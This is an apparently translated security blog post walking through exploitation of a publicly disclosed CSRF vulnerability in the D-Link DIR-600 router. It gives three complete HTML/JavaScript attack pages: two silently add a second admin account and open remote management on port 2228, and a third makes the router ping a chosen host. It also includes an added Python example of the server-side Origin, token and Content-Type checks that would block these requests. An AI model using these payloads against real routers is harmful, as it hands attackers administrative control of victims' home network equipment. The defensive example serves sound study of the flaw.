Full walkthrough of attacking a D-Link router via a CSRF vulnerability


2019-02-14 09:36:40 | Author: 寻春 | Tags: vulnerability, router, administration | Views: 1177

1. Introduction

The purpose of this article is to demonstrate the damage a CSRF vulnerability can do, using the CSRF vulnerability in D-Link's DIR-600 router (hardware version BX, firmware version 2.16) as the example.
The D-Link CSRF vulnerability has already been publicly disclosed; this article describes the whole exploitation of it in detail, namely how the CSRF vulnerability is used to obtain remote administrative access to the D-Link router.

2. Description of the CSRF vulnerability

If some requests carry no CSRF token and require no password authorization, a CSRF vulnerability exists: it allows an attacker to forge requests in the name of a logged-in user, and so can make that user carry out whatever operations the attacker wants.
Through the CSRF vulnerability in the D-Link management panel, an attacker can do the following:

1. Add a new admin account;
2. Enable remote management on the router;
3. Ping a specific machine; this operation only requires being logged in to the router, and the router's WAN IP address must be known.

3. Part 1: Adding a new admin account to the router

Two requests are needed to accomplish this.

REQUEST1:

The code is as follows:
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://192.168.0.1/hedwig.cgi", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "text/plain; charset=UTF-8");
xhr.withCredentials = "true";
var body = "<?xml version=\"1.0\" encoding=\"UTF-8\" ?>"+
"<postxml>"+
"<module>"+
"<service>DEVICE.ACCOUNT</service>"+
"<device>"+
"<account>"+
"<seqno/>"+
"<max>1</max>"+
"<count>2</count>"+
"<entry>"+
"<name>admin</name>"+
"<password>OoXxGgYy</password>"+
"<group>0</group>"+
"<description/>"+
"</entry>"+
"<entry>"+
"<name>admin2</name>"+
"<password>pass2</password>"+
"<group>0</group>"+
"<description/>"+
"</entry>"+
"</account>"+
"<session>"+
"<captcha>0</captcha>"+
"<dummy/>"+
"<timeout>180</timeout>"+
"<maxsession>128</maxsession>"+
"<maxauthorized>16</maxauthorized>"+
"</session>"+
"</device>"+
"</module>"+
"<module>"+
"<service>HTTP.WAN-1</service>"+
"<inf>"+
"<web>2228</web>"+
"<weballow>"+
"<hostv4ip/>"+
"</weballow>"+
"</inf>"+
"</module>"+
"<module>"+
"<service>HTTP.WAN-2</service>"+
"<inf>"+
"<web>2228</web>"+
"<weballow>"+
"<hostv4ip/>"+
"</weballow>"+
"</inf>"+
"</module>"+
"</postxml>";
xhr.send(body);
}
</script>
<form action="#">
<input type="button" value="Submit request1" onclick="submitRequest();" />
</form>
</body>
</html>
REQUEST2:

The code is as follows:
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://192.168.0.1/pigwidgeon.cgi", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = "true";
var body = "ACTIONS=SETCFG%2CSAVE%2CACTIVATE";
xhr.send(body);
}
</script>
<form action="#">
<input type="button" value="Submit request2" onclick="submitRequest();" />
</form>
</body>
</html>
In REQUEST1 and REQUEST2 the router's default LAN IP address is 192.168.0.1 and the admin account is admin. In REQUEST1, when the password field is OoXxGgYy, the password of the admin account is not changed. Together these two requests add the admin account admin2 and enable remote management on port 2228.
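What makes these requests work is that the CGI endpoints accept any cookie-authenticated POST: there is no anti-CSRF token, the cross-site Origin is not checked, and a text/plain body is accepted, so the browser sends the XHR without a CORS preflight. As an added example that is not D-Link code, the following Python check shows the server-side validation that would reject REQUEST1 and REQUEST2 while still accepting the router's own admin page (the session token, cookie and attacker host are constructed values):

```python
# Added example (not D-Link firmware code): a server-side check that rejects the
# cross-site XHR requests shown above.  It combines three mitigations the
# vulnerable CGI endpoints lack: an Origin/Referer check against the router's own
# address, a per-session synchronizer token, and a Content-Type allow-list so a
# "simple" cross-origin POST (text/plain, no preflight) cannot deliver an XML body.
from urllib.parse import urlsplit

ROUTER_HOSTS = {"192.168.0.1"}          # default LAN address from the article
ALLOWED_CONTENT_TYPES = {"application/x-www-form-urlencoded", "text/xml"}


def check_csrf(headers, session_token):
    """Return (accepted, reason) for an authenticated state-changing POST.

    `headers` maps lowercase header names to values; `session_token` is the
    anti-CSRF token the router stored for this login session (assumed).
    """
    # 1. Where did the browser say the request came from?
    source = headers.get("origin") or headers.get("referer")
    if not source:
        return False, "missing Origin and Referer"
    if urlsplit(source).hostname not in ROUTER_HOSTS:
        return False, "cross-site origin %s" % source
    # 2. Did the sending page know this session's anti-CSRF token?
    if headers.get("x-csrf-token") != session_token:
        return False, "missing or wrong anti-CSRF token"
    # 3. Only body types the management UI itself uses.
    ctype = headers.get("content-type", "").split(";")[0].strip()
    if ctype not in ALLOWED_CONTENT_TYPES:
        return False, "unexpected Content-Type %r" % ctype
    return True, "ok"


# Constructed header sets.  The first mirrors REQUEST1: a cookie-bearing XHR
# from an attacker-controlled page, text/plain body, no token.
ATTACK_REQUEST1 = {
    "cookie": "session=CONSTRUCTED",
    "origin": "http://attacker.example",
    "content-type": "text/plain; charset=UTF-8",
}
# The second is what the router's own admin page would send.
LEGIT_REQUEST = {
    "cookie": "session=CONSTRUCTED",
    "origin": "http://192.168.0.1",
    "x-csrf-token": "t0k3n",
    "content-type": "text/xml; charset=UTF-8",
}

if __name__ == "__main__":
    print(check_csrf(ATTACK_REQUEST1, "t0k3n"))   # (False, 'cross-site origin http://attacker.example')
    print(check_csrf(LEGIT_REQUEST, "t0k3n"))     # (True, 'ok')
```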

Part 2: Pinging a specific host

REQUEST3:

The code is as follows:
<html>
<body>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "https://192.168.0.1/diagnostic.php", true);
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8");
xhr.withCredentials = "true";
var body = "act=ping&dst=X.Y.Z.W";
xhr.send(body);
}
</script>
<form action="#">
<input type="button" value="Submit request3" onclick="submitRequest();" />
</form>
</body>
</html>
Simply set X.Y.Z.W in this code to the IP address of the host you need to ping.
